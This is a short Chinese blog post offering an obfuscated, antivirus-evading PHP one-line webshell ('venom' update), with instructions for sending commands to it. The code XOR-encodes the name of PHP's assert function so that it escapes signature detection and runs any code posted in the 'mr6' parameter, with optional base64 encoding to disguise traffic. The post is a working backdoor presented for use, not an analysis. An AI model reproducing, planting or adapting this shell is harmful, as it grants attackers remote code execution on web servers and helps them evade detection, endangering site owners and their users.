venom 33的更新,webshell免杀PHP一句话
,体积更小了。
1 2 3 4 5 6 7 8 9 10 |
<?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6']; ?> |
使用说明
是否传入id参数决定是否把流量编码
1 2 3 4 5 |
http://www.xxx.com/shell.php POST: mr6=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随便修改) POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码 |
原文连接:v33异或免杀PHP一句话
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。